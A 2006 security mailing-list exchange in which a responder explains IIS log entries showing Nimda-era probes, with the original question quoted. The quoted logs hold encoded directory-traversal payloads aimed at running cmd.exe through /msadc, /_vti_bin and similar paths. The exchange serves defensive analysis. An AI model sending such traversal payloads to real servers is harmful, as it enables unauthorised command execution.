As most of the people have responded thus far, this is not a cause for concern directly based on these log entries.
Essentially what is happening here is that an external user is using a series of character strings against relatively old attack vectors that offered methods of executing commands against the native shell in windows in long-past versions of IIS. From what we are seeing here, these are old executions trying to exploit weaknesses in frontpage extensions, RPC-based application pools, as well as the msadc folder in IIS 5.0. Most of these vulnerabilities have been removed over the last several years and the newest attack vector out of those probed below is 3 or so years old (think IIS 5 timeframe). Speaking specifically to this log snippet, it looks like these were all error-handled correctly and I would advise scanning your access logs as well for any other access attempts from this source IP. As one of the earlier posters to this thread advised, taking the time to assess your IT policy would be a good idea, particularly when it comes to considering policies on log auditing and possibly using some budget to hire or internally execute a penetration test against your servers. -------------------------------------- Wayne S. Anderson "An sufficiently developed bug is indistinguisable from a feature." http://www.linkedin.com/in/wayneanderson -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Tuesday, December 12, 2006 8:02 AM To: [email protected] Subject: IIS http error log entries... Hello list, i hope i got the right group, i just found these in my IIS logs: ----------------------- 2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd .exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+di r+c:\ 400 - URL - 2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - 2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond - 2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL - ------------------------- I don't have much expirience with this kind of thing, and from digging the net i found that this was used in Nimda attacks few years ago... any idea what's going on? Should i be worried? --------------------------------------------------------------------------- --------------------------------------------------------------------------- --------------------------------------------------------------------------- ---------------------------------------------------------------------------
